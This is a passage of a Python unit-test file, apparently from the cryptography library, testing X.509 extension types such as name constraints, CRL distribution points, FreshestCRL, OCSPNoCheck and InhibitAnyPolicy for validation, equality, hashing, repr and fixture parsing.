                x509.UniformResourceIdentifier("gopher://cryptography.test"),
            ],
        )
    def test_permitted_excluded_with_ips(self, backend):
        """IPv4 and IPv6 network subtrees parse as IPAddress general names."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_permitted_excluded.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        nc = cert.extensions.get_extension_for_oid(
            ExtensionOID.NAME_CONSTRAINTS
        ).value
        assert nc == x509.NameConstraints(
            permitted_subtrees=[
                x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/24")),
                x509.IPAddress(ipaddress.IPv6Network("FF:0:0:0:0:0:0:0/96")),
            ],
            excluded_subtrees=[
                x509.DNSName(".domain.com"),
                x509.UniformResourceIdentifier("http://test.local"),
            ],
        )
    def test_single_ip_netmask(self, backend):
        """Host-precision netmasks (/128 and /32) parse correctly."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_single_ip_netmask.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        nc = cert.extensions.get_extension_for_oid(
            ExtensionOID.NAME_CONSTRAINTS
        ).value
        assert nc == x509.NameConstraints(
            permitted_subtrees=[
                x509.IPAddress(ipaddress.IPv6Network("FF:0:0:0:0:0:0:0/128")),
                x509.IPAddress(ipaddress.IPv4Network("192.168.0.1/32")),
            ],
            excluded_subtrees=None,
        )
    def test_invalid_netmask(self, backend):
        """A malformed netmask in the fixture raises ValueError on parse."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_invalid_ip_netmask.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        with pytest.raises(ValueError):
            cert.extensions.get_extension_for_oid(
                ExtensionOID.NAME_CONSTRAINTS
            )
    def test_certbuilder(self, backend):
        """Round-trip: DNS name constraints written via CertificateBuilder
        are read back unchanged (including IDNA A-label form)."""
        permitted = [
            ".example.org",
            ".xn--4ca7aey.example.com",
            "foobar.example.net",
        ]
        private_key = RSA_KEY_2048.private_key(backend)
        builder = _make_certbuilder(private_key)
        builder = builder.add_extension(
            NameConstraints(
                permitted_subtrees=list(map(DNSName, permitted)),
                excluded_subtrees=[],
            ),
            True,
        )
        cert = builder.sign(private_key, hashes.SHA1(), backend)
        result = [
            x.value
            for x in cert.extensions.get_extension_for_class(
                NameConstraints
            ).value.permitted_subtrees
        ]
        assert result == permitted
class TestDistributionPoint(object):
    """Unit tests for the ``x509.DistributionPoint`` value type: constructor
    validation (mutually exclusive full/relative name, reason-flag rules),
    iterator inputs, equality, ``repr`` and hashing.
    """
    def test_distribution_point_full_name_not_general_names(self):
        with pytest.raises(TypeError):
            x509.DistributionPoint(
                ["notgn"], None, None, None  # type:ignore[list-item]
            )
    def test_distribution_point_relative_name_not_name(self):
        with pytest.raises(TypeError):
            x509.DistributionPoint(
                None, "notname", None, None  # type:ignore[arg-type]
            )
    def test_distribution_point_full_and_relative_not_none(self):
        """full_name and relative_name are mutually exclusive."""
        with pytest.raises(ValueError):
            x509.DistributionPoint(
                "data", "notname", None, None  # type:ignore[arg-type]
            )
    def test_crl_issuer_not_general_names(self):
        with pytest.raises(TypeError):
            x509.DistributionPoint(
                None, None, None, ["notgn"]  # type:ignore[list-item]
            )
    def test_reason_not_reasonflags(self):
        with pytest.raises(TypeError):
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://crypt.og/crl")],
                None,
                frozenset(["notreasonflags"]),  # type:ignore[list-item]
                None,
            )
    def test_reason_not_frozenset(self):
        """Reasons must be a frozenset, not a plain list."""
        with pytest.raises(TypeError):
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://crypt.og/crl")],
                None,
                [x509.ReasonFlags.ca_compromise],  # type:ignore[arg-type]
                None,
            )
    def test_disallowed_reasons(self):
        """unspecified and remove_from_crl are not valid DP reasons."""
        with pytest.raises(ValueError):
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://crypt.og/crl")],
                None,
                frozenset([x509.ReasonFlags.unspecified]),
                None,
            )
        with pytest.raises(ValueError):
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://crypt.og/crl")],
                None,
                frozenset([x509.ReasonFlags.remove_from_crl]),
                None,
            )
    def test_reason_only(self):
        """Reasons alone (no name, no crl_issuer) are rejected."""
        with pytest.raises(ValueError):
            x509.DistributionPoint(
                None, None, frozenset([x509.ReasonFlags.aa_compromise]), None
            )
    def test_eq(self):
        dp = x509.DistributionPoint(
            [x509.UniformResourceIdentifier("http://crypt.og/crl")],
            None,
            frozenset([x509.ReasonFlags.superseded]),
            [
                x509.DirectoryName(
                    x509.Name(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME, "Important CA"
                            )
                        ]
                    )
                )
            ],
        )
        dp2 = x509.DistributionPoint(
            [x509.UniformResourceIdentifier("http://crypt.og/crl")],
            None,
            frozenset([x509.ReasonFlags.superseded]),
            [
                x509.DirectoryName(
                    x509.Name(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME, "Important CA"
                            )
                        ]
                    )
                )
            ],
        )
        assert dp == dp2
    def test_ne(self):
        dp = x509.DistributionPoint(
            [x509.UniformResourceIdentifier("http://crypt.og/crl")],
            None,
            frozenset([x509.ReasonFlags.superseded]),
            [
                x509.DirectoryName(
                    x509.Name(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME, "Important CA"
                            )
                        ]
                    )
                )
            ],
        )
        dp2 = x509.DistributionPoint(
            [x509.UniformResourceIdentifier("http://crypt.og/crl")],
            None,
            None,
            None,
        )
        assert dp != dp2
        assert dp != object()
    def test_iter_input(self):
        """Iterator inputs for full_name and crl_issuer are materialized."""
        name = [x509.UniformResourceIdentifier("http://crypt.og/crl")]
        issuer = [
            x509.DirectoryName(
                x509.Name(
                    [x509.NameAttribute(NameOID.COMMON_NAME, "Important CA")]
                )
            )
        ]
        dp = x509.DistributionPoint(
            iter(name),
            None,
            frozenset([x509.ReasonFlags.ca_compromise]),
            iter(issuer),
        )
        assert dp.full_name is not None
        assert list(dp.full_name) == name
        assert dp.crl_issuer is not None
        assert list(dp.crl_issuer) == issuer
    def test_repr(self):
        dp = x509.DistributionPoint(
            None,
            x509.RelativeDistinguishedName(
                [x509.NameAttribute(NameOID.COMMON_NAME, "myCN")]
            ),
            frozenset([x509.ReasonFlags.ca_compromise]),
            [
                x509.DirectoryName(
                    x509.Name(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME, "Important CA"
                            )
                        ]
                    )
                )
            ],
        )
        assert repr(dp) == (
            "<DistributionPoint(full_name=None, relative_name=<RelativeDis"
            "tinguishedName(CN=myCN)>, reasons=frozenset({<ReasonFlags.ca_"
            "compromise: 'cACompromise'>}), crl_issuer=[<DirectoryName(val"
            "ue=<Name(CN=Important CA)>)>])>"
        )
    def test_hash(self):
        """Equal DPs hash alike; a structurally different DP hashes apart."""
        dp = x509.DistributionPoint(
            [x509.UniformResourceIdentifier("http://crypt.og/crl")],
            None,
            frozenset([x509.ReasonFlags.superseded]),
            [
                x509.DirectoryName(
                    x509.Name(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME, "Important CA"
                            )
                        ]
                    )
                )
            ],
        )
        dp2 = x509.DistributionPoint(
            [x509.UniformResourceIdentifier("http://crypt.og/crl")],
            None,
            frozenset([x509.ReasonFlags.superseded]),
            [
                x509.DirectoryName(
                    x509.Name(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME, "Important CA"
                            )
                        ]
                    )
                )
            ],
        )
        dp3 = x509.DistributionPoint(
            None,
            x509.RelativeDistinguishedName(
                [x509.NameAttribute(NameOID.COMMON_NAME, "myCN")]
            ),
            None,
            None,
        )
        assert hash(dp) == hash(dp2)
        assert hash(dp) != hash(dp3)
class TestFreshestCRL(object):
    """Unit tests for the ``x509.FreshestCRL`` container: construction
    validation, iteration/len, ``repr``, equality, hashing and indexing.
    """
    def test_invalid_distribution_points(self):
        """Elements must be DistributionPoint instances."""
        with pytest.raises(TypeError):
            x509.FreshestCRL(
                ["notadistributionpoint"]  # type:ignore[list-item]
            )
    def test_iter_len(self):
        fcrl = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("http://domain")],
                    None,
                    None,
                    None,
                ),
            ]
        )
        assert len(fcrl) == 1
        assert list(fcrl) == [
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://domain")],
                None,
                None,
                None,
            ),
        ]
    def test_iter_input(self):
        """An iterator of distribution points is accepted and materialized."""
        points = [
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://domain")],
                None,
                None,
                None,
            ),
        ]
        fcrl = x509.FreshestCRL(iter(points))
        assert list(fcrl) == points
    def test_repr(self):
        fcrl = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset([x509.ReasonFlags.key_compromise]),
                    None,
                ),
            ]
        )
        assert repr(fcrl) == (
            "<FreshestCRL([<DistributionPoint(full_name=[<Unifo"
            "rmResourceIdentifier(value='ftp://domain')>], relative"
            "_name=None, reasons=frozenset({<ReasonFlags.key_compromise: "
            "'keyCompromise'>}), crl_issuer=None)>])>"
        )
    def test_eq(self):
        fcrl = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        fcrl2 = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        assert fcrl == fcrl2
    def test_ne(self):
        """Inequality is triggered by a differing full_name, reasons set,
        crl_issuer, or comparison with an unrelated type."""
        fcrl = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        fcrl2 = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain2")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        fcrl3 = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset([x509.ReasonFlags.key_compromise]),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        fcrl4 = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing2")],
                ),
            ]
        )
        assert fcrl != fcrl2
        assert fcrl != fcrl3
        assert fcrl != fcrl4
        assert fcrl != object()
    def test_hash(self):
        fcrl = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        fcrl2 = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        fcrl3 = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset([x509.ReasonFlags.key_compromise]),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        assert hash(fcrl) == hash(fcrl2)
        assert hash(fcrl) != hash(fcrl3)
    def test_indexing(self):
        """Supports negative indices and extended slices like a sequence."""
        fcrl = x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing2")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing3")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing4")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing5")],
                ),
            ]
        )
        assert fcrl[-1] == fcrl[4]
        assert fcrl[2:6:2] == [fcrl[2], fcrl[4]]
class TestCRLDistributionPoints(object):
    """Unit tests for the ``x509.CRLDistributionPoints`` container; mirrors
    TestFreshestCRL since both wrap a sequence of DistributionPoint values.
    """
    def test_invalid_distribution_points(self):
        """Elements must be DistributionPoint instances."""
        with pytest.raises(TypeError):
            x509.CRLDistributionPoints(
                ["notadistributionpoint"],  # type:ignore[list-item]
            )
    def test_iter_len(self):
        cdp = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("http://domain")],
                    None,
                    None,
                    None,
                ),
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    None,
                ),
            ]
        )
        assert len(cdp) == 2
        assert list(cdp) == [
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://domain")],
                None,
                None,
                None,
            ),
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("ftp://domain")],
                None,
                frozenset(
                    [
                        x509.ReasonFlags.key_compromise,
                        x509.ReasonFlags.ca_compromise,
                    ]
                ),
                None,
            ),
        ]
    def test_iter_input(self):
        """An iterator of distribution points is accepted and materialized."""
        points = [
            x509.DistributionPoint(
                [x509.UniformResourceIdentifier("http://domain")],
                None,
                None,
                None,
            ),
        ]
        cdp = x509.CRLDistributionPoints(iter(points))
        assert list(cdp) == points
    def test_repr(self):
        cdp = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset([x509.ReasonFlags.key_compromise]),
                    None,
                ),
            ]
        )
        assert repr(cdp) == (
            "<CRLDistributionPoints([<DistributionPoint(full_name=[<Unifo"
            "rmResourceIdentifier(value='ftp://domain')>], relative"
            "_name=None, reasons=frozenset({<ReasonFlags.key_compromise: "
            "'keyCompromise'>}), crl_issuer=None)>])>"
        )
    def test_eq(self):
        cdp = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        cdp2 = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        assert cdp == cdp2
    def test_ne(self):
        """Inequality is triggered by a differing full_name, reasons set,
        crl_issuer, or comparison with an unrelated type."""
        cdp = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        cdp2 = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain2")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        cdp3 = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset([x509.ReasonFlags.key_compromise]),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        cdp4 = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing2")],
                ),
            ]
        )
        assert cdp != cdp2
        assert cdp != cdp3
        assert cdp != cdp4
        assert cdp != object()
    def test_hash(self):
        cdp = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        cdp2 = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        cdp3 = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    [x509.UniformResourceIdentifier("ftp://domain")],
                    None,
                    frozenset([x509.ReasonFlags.key_compromise]),
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
            ]
        )
        assert hash(cdp) == hash(cdp2)
        assert hash(cdp) != hash(cdp3)
    def test_indexing(self):
        """Supports negative indices and extended slices like a sequence."""
        ci = x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing2")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing3")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing4")],
                ),
                x509.DistributionPoint(
                    None,
                    None,
                    None,
                    [x509.UniformResourceIdentifier("uri://thing5")],
                ),
            ]
        )
        assert ci[-1] == ci[4]
        assert ci[2:6:2] == [ci[2], ci[4]]
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCRLDistributionPointsExtension(object):
    """Parsing tests for the CRL Distribution Points extension, covering the
    various field combinations found in the PKITS and custom fixture certs.
    """
    def test_fullname_and_crl_issuer(self, backend):
        """DP with a DirectoryName full_name plus a crl_issuer."""
        cert = _load_cert(
            os.path.join(
                "x509", "PKITS_data", "certs", "ValidcRLIssuerTest28EE.crt"
            ),
            x509.load_der_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=[
                        x509.DirectoryName(
                            x509.Name(
                                [
                                    x509.NameAttribute(
                                        NameOID.COUNTRY_NAME, "US"
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATION_NAME,
                                        "Test Certificates 2011",
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATIONAL_UNIT_NAME,
                                        "indirectCRL CA3 cRLIssuer",
                                    ),
                                    x509.NameAttribute(
                                        NameOID.COMMON_NAME,
                                        "indirect CRL for indirectCRL CA3",
                                    ),
                                ]
                            )
                        )
                    ],
                    relative_name=None,
                    reasons=None,
                    crl_issuer=[
                        x509.DirectoryName(
                            x509.Name(
                                [
                                    x509.NameAttribute(
                                        NameOID.COUNTRY_NAME, "US"
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATION_NAME,
                                        "Test Certificates 2011",
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATIONAL_UNIT_NAME,
                                        "indirectCRL CA3 cRLIssuer",
                                    ),
                                ]
                            )
                        )
                    ],
                )
            ]
        )
    def test_relativename_and_crl_issuer(self, backend):
        """DP using nameRelativeToCRLIssuer instead of a full name."""
        cert = _load_cert(
            os.path.join(
                "x509", "PKITS_data", "certs", "ValidcRLIssuerTest29EE.crt"
            ),
            x509.load_der_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=None,
                    relative_name=x509.RelativeDistinguishedName(
                        [
                            x509.NameAttribute(
                                NameOID.COMMON_NAME,
                                "indirect CRL for indirectCRL CA3",
                            ),
                        ]
                    ),
                    reasons=None,
                    crl_issuer=[
                        x509.DirectoryName(
                            x509.Name(
                                [
                                    x509.NameAttribute(
                                        NameOID.COUNTRY_NAME, "US"
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATION_NAME,
                                        "Test Certificates 2011",
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATIONAL_UNIT_NAME,
                                        "indirectCRL CA3 cRLIssuer",
                                    ),
                                ]
                            )
                        )
                    ],
                )
            ]
        )
    def test_fullname_crl_issuer_reasons(self, backend):
        """DP with full_name URI, a reasons set, and a crl_issuer."""
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "cdp_fullname_reasons_crl_issuer.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=[
                        x509.UniformResourceIdentifier(
                            "http://myhost.com/myca.crl"
                        )
                    ],
                    relative_name=None,
                    reasons=frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                        ]
                    ),
                    crl_issuer=[
                        x509.DirectoryName(
                            x509.Name(
                                [
                                    x509.NameAttribute(
                                        NameOID.COUNTRY_NAME, "US"
                                    ),
                                    x509.NameAttribute(
                                        NameOID.ORGANIZATION_NAME, "PyCA"
                                    ),
                                    x509.NameAttribute(
                                        NameOID.COMMON_NAME, "cryptography CA"
                                    ),
                                ]
                            )
                        )
                    ],
                )
            ]
        )
    def test_all_reasons(self, backend):
        """All eight DP-valid reason flags parse into the frozenset."""
        cert = _load_cert(
            os.path.join("x509", "custom", "cdp_all_reasons.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=[
                        x509.UniformResourceIdentifier(
                            "http://domain.com/some.crl"
                        )
                    ],
                    relative_name=None,
                    reasons=frozenset(
                        [
                            x509.ReasonFlags.key_compromise,
                            x509.ReasonFlags.ca_compromise,
                            x509.ReasonFlags.affiliation_changed,
                            x509.ReasonFlags.superseded,
                            x509.ReasonFlags.privilege_withdrawn,
                            x509.ReasonFlags.cessation_of_operation,
                            x509.ReasonFlags.aa_compromise,
                            x509.ReasonFlags.certificate_hold,
                        ]
                    ),
                    crl_issuer=None,
                )
            ]
        )
    def test_single_reason(self, backend):
        """A single reason flag (aACompromise) parses correctly."""
        cert = _load_cert(
            os.path.join("x509", "custom", "cdp_reason_aa_compromise.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=[
                        x509.UniformResourceIdentifier(
                            "http://domain.com/some.crl"
                        )
                    ],
                    relative_name=None,
                    reasons=frozenset([x509.ReasonFlags.aa_compromise]),
                    crl_issuer=None,
                )
            ]
        )
    def test_crl_issuer_only(self, backend):
        """DP carrying only a crl_issuer; name and reasons are None."""
        cert = _load_cert(
            os.path.join("x509", "custom", "cdp_crl_issuer.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=None,
                    relative_name=None,
                    reasons=None,
                    crl_issuer=[
                        x509.DirectoryName(
                            x509.Name(
                                [
                                    x509.NameAttribute(
                                        NameOID.COMMON_NAME, "cryptography CA"
                                    ),
                                ]
                            )
                        )
                    ],
                )
            ]
        )
    def test_crl_empty_hostname(self, backend):
        """An ldap URI with an empty hostname is preserved verbatim."""
        cert = _load_cert(
            os.path.join("x509", "custom", "cdp_empty_hostname.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cdps = cert.extensions.get_extension_for_oid(
            ExtensionOID.CRL_DISTRIBUTION_POINTS
        ).value
        assert cdps == x509.CRLDistributionPoints(
            [
                x509.DistributionPoint(
                    full_name=[
                        x509.UniformResourceIdentifier(
                            "ldap:///CN=A,OU=B,dc=C,DC=D?E?F?G?H=I"
                        )
                    ],
                    relative_name=None,
                    reasons=None,
                    crl_issuer=None,
                )
            ]
        )
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestFreshestCRLExtension(object):
    """Parsing test for the Freshest CRL extension from a fixture cert."""
    def test_vector(self, backend):
        """Multiple full_name URIs, a reasons set and a crl_issuer all
        parse into a single DistributionPoint."""
        cert = _load_cert(
            os.path.join("x509", "custom", "freshestcrl.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        fcrl = cert.extensions.get_extension_for_class(x509.FreshestCRL).value
        assert fcrl == x509.FreshestCRL(
            [
                x509.DistributionPoint(
                    full_name=[
                        x509.UniformResourceIdentifier(
                            "http://myhost.com/myca.crl"
                        ),
                        x509.UniformResourceIdentifier(
                            "http://backup.myhost.com/myca.crl"
                        ),
                    ],
                    relative_name=None,
                    reasons=frozenset(
                        [
                            x509.ReasonFlags.ca_compromise,
                            x509.ReasonFlags.key_compromise,
                        ]
                    ),
                    crl_issuer=[
                        x509.DirectoryName(
                            x509.Name(
                                [
                                    x509.NameAttribute(
                                        NameOID.COUNTRY_NAME, "US"
                                    ),
                                    x509.NameAttribute(
                                        NameOID.COMMON_NAME, "cryptography CA"
                                    ),
                                ]
                            )
                        )
                    ],
                )
            ]
        )
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestOCSPNoCheckExtension(object):
    """Tests for the OCSPNoCheck extension: parsing from a fixture plus
    equality/hash/repr of the (stateless) value type."""
    def test_nocheck(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "ocsp_nocheck.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(ExtensionOID.OCSP_NO_CHECK)
        assert isinstance(ext.value, x509.OCSPNoCheck)
    def test_eq(self):
        onc1 = x509.OCSPNoCheck()
        onc2 = x509.OCSPNoCheck()
        assert onc1 == onc2
    def test_hash(self):
        onc1 = x509.OCSPNoCheck()
        onc2 = x509.OCSPNoCheck()
        assert hash(onc1) == hash(onc2)
    def test_ne(self):
        """All instances compare equal; != is False between instances and
        True only against unrelated types."""
        onc1 = x509.OCSPNoCheck()
        onc2 = x509.OCSPNoCheck()
        assert onc1 == onc2
        assert (onc1 != onc2) is False
        assert onc1 != object()
    def test_repr(self):
        onc = x509.OCSPNoCheck()
        assert repr(onc) == "<OCSPNoCheck()>"
class TestInhibitAnyPolicy(object):
    """Unit tests for the ``x509.InhibitAnyPolicy`` value type: argument
    validation, ``repr``, equality and hashing."""

    def test_not_int(self):
        # skip_certs must be an int; any other type raises TypeError.
        with pytest.raises(TypeError):
            x509.InhibitAnyPolicy("notint")  # type:ignore[arg-type]

    def test_negative_int(self):
        # Negative skip_certs values are rejected with ValueError.
        with pytest.raises(ValueError):
            x509.InhibitAnyPolicy(-1)

    def test_repr(self):
        assert repr(x509.InhibitAnyPolicy(0)) == (
            "<InhibitAnyPolicy(skip_certs=0)>"
        )

    def test_eq(self):
        policy = x509.InhibitAnyPolicy(1)
        same = x509.InhibitAnyPolicy(1)
        assert policy == same

    def test_ne(self):
        policy = x509.InhibitAnyPolicy(1)
        different = x509.InhibitAnyPolicy(4)
        assert policy != different
        assert policy != object()

    def test_hash(self):
        # Hash agrees with equality on skip_certs.
        policy = x509.InhibitAnyPolicy(1)
        same = x509.InhibitAnyPolicy(1)
        different = x509.InhibitAnyPolicy(4)
        assert hash(policy) == hash(same)
        assert hash(policy) != hash(different)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestInhibitAnyPolicyExtension(object):
    """Parsing test for the Inhibit anyPolicy extension from a fixture."""
